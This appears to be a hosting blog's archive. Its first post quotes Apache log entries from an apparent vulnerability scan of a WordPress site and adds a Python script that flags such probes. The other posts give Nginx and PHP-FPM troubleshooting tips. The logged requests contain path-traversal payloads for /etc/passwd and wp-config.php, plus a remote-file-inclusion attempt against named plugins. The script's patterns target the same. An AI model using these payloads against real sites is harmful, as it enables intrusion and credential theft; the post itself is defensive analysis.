Category Archives: Hosting

WTF?! Is Google trying to hack WordPress sites??

Looking through the Apache access logs of one of my WordPress installations the other day, I noticed these entries:

35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /robots.txt HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:07 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 410 318 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "POST /wp-content/plugins/wp-symposium/server/php/index.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "GET /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"

First of all: all these logged requests are coming from IP address 35.198.55.156 which is reported by Whois ARIN as belonging to Google Inc, Mountain View, USA.

Now, notice the first log entry accessing the /robots.txt which seems perfectly fine. Especially since it’s Google, right? But then again, the User-Agent is marked as “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32” which is not any of the usual Google crawler User-Agents. Besides, it says “Windows NT 10.0” and “OPR/36.0.2130.32” (Opera 36 browser as reported by whatismybrowser.com) in there.

Triggered by the weird attempts that follow immediately in the few seconds after that first entry, trying to access files and locations that do not exist, like /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js, /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php (what? trying to access a very hacky file on another site through mine?), /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php or even /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd (seriously? trying to download the server passwd file?!)… this is very disturbing.

Is Google scanning for vulnerabilities which it would then kindly announce to me when any would be found? I’ve never heard that before… Is this coming from one of their employees who came in with his/her own Window$ (obviously) laptop, unaware of the fact it has a bot running in the background? Seems unlikely to be using that specific Opera user agent… Or are they actually trying to hack my application?

I reported the incident to Google and hope — but don’t expect — to hear more from them soon!

Does anybody know what could be going on here?
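The triage done by eye in this post can be scripted. The following is an added example, not code from the original post: it parses lines in the log layout shown above, tags each request (path traversal, sensitive file names, a remote URL passed as a parameter, direct PHP requests inside plugin or theme directories) and reports client IPs whose flagged requests span several plugins or themes. The rule names, the `min_components` threshold and the `sample_line` helper are assumptions made for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Log layout used in the post: ip vhost - [time] "request" status bytes "referer" "agent"
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"[A-Z]+ (?P<url>\S+) [^"]*" (?P<status>\d{3}) ')
COMPONENT = re.compile(r'^/wp-content/(?:plugins|themes)/(?:\./)*([^/?]+)/')
RULES = [  # rule names are this example's own
    ("traversal", re.compile(r'\.\./')),
    ("sensitive-file", re.compile(r'/etc/passwd|wp-config\.php')),
    ("remote-url-param", re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.I)),
    ("php-in-extension-dir", re.compile(r'^/wp-content/(?:plugins|themes)/[^?]*\.php')),
]

def classify(url):
    """Names of every rule the URL-decoded request target matches."""
    return [name for name, rx in RULES if rx.search(unquote(url))]

def scan(lines, min_components=3):
    """Per client IP: flagged requests, plugins/themes probed, flagged requests served 2xx."""
    per_ip = defaultdict(lambda: {"flagged": [], "components": set(), "served": []})
    for line in lines:
        if not (m := LINE.match(line)) or not (tags := classify(m["url"])):
            continue  # unparsable line or nothing suspicious in the request
        entry = per_ip[m["ip"]]
        entry["flagged"].append((m["url"], tags))
        if comp := COMPONENT.match(unquote(m["url"])):
            entry["components"].add(comp.group(1))
        if m["status"].startswith("2"):
            entry["served"].append(m["url"])  # probe got a 2xx: inspect by hand
    # Flagged requests spread over several unrelated plugins/themes indicate a scanner.
    return {ip: e for ip, e in per_ip.items() if len(e["components"]) >= min_components}

def sample_line(ip, request, status):  # hypothetical helper; user agent shortened
    return (f'{ip} xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] '
            f'"{request} HTTP/1.1" {status} 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64)"')

SAMPLE = [  # requests abridged from the entries above; the 203.0.113.7 line is constructed
    sample_line("35.198.55.156", "GET /robots.txt", 200),
    sample_line("35.198.55.156", "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php", 500),
    sample_line("35.198.55.156", "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php", 410),
    sample_line("35.198.55.156", "GET /wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd", 500),
    sample_line("35.198.55.156", "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd", 500),
    sample_line("203.0.113.7", "GET /wp-content/themes/example-theme/style.css", 200),
]

if __name__ == "__main__":
    print({ip: sorted(e["components"]) for ip, e in scan(SAMPLE).items()})
```

An empty `served` list means none of the flagged requests received a 2xx response; any URL that does appear there is the first thing to inspect. The `php-in-extension-dir` rule also matches legitimate plugin endpoints, which is why an IP is reported only once its flagged requests span several plugins or themes.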

Nginx 1.8.0 “/usr/sbin/service: line 123: exec: reload: not found”

Recently, on one of our older servers, a Debian 6 installation, Nginx was upgraded to 1.8.0 from the dotdeb repos. The update went without any apparent errors, except one — easy to miss — message at the end:

/usr/sbin/service: line 123: exec: reload: not found

In fact, I had missed that and assumed all was fine but after a while the server went down and Nginx would not start again. At least, not after the usual nginx -t && service nginx reload

To my surprise, all other web services like php5-fpm, mysql etc. reloaded just fine with service ... reload

A reboot did not start nginx either and service nginx start got a similar response:

/usr/sbin/service: line 123: exec: start: not found

Luckily, upon /etc/init.d/nginx start Nginx started correctly so I had my server running again. But I was not closer to finding the cause nor a solution.

Searching the web specifically for nginx 1.8 and debian 6 related issues did not reveal anything of interest. Only one question mentioning the issue in the comments on https://www.dotdeb.org/2015/05/07/nginx-1-8-0/ but it got no response.

I did find a bug report related to an entirely different service which mentioned the same error. And the solution there was to remove that service’s .conf file from /etc/init … so I looked in /etc/init and yes: there was an nginx.conf file there. And yes again: simply deleting it solved the problem!

502 Bad Gateway after upgrade to PHP 5.5.5 on Nginx server

Quick tip: If you’re getting 502 Bad Gateway errors after upgrading your Debian Wheezy Nginx server to PHP5-FPM 5.5.5 then check out your www.conf file. Look for these lines:

;listen.owner = www-data
;listen.group = www-data

Uncomment them by removing the ‘;’ in front of all these lines so it looks like:

listen.owner = www-data
listen.group = www-data

Then load the new settings into PHP, which on my Nginx servers usually is done with:

service php5-fpm reload

WordPress 3.7 “Basie”

The Status 301 Network has just been upgraded successfully to the latest stable WordPress release: 3.7.1 “Basie”. Moreover, the admin theme MP6 has been added in preparation of the expected 3.8 release in December, providing a cleaner admin interface.

Read more about new features in WordPress 3.7 “Basie” on the WordPress News blog.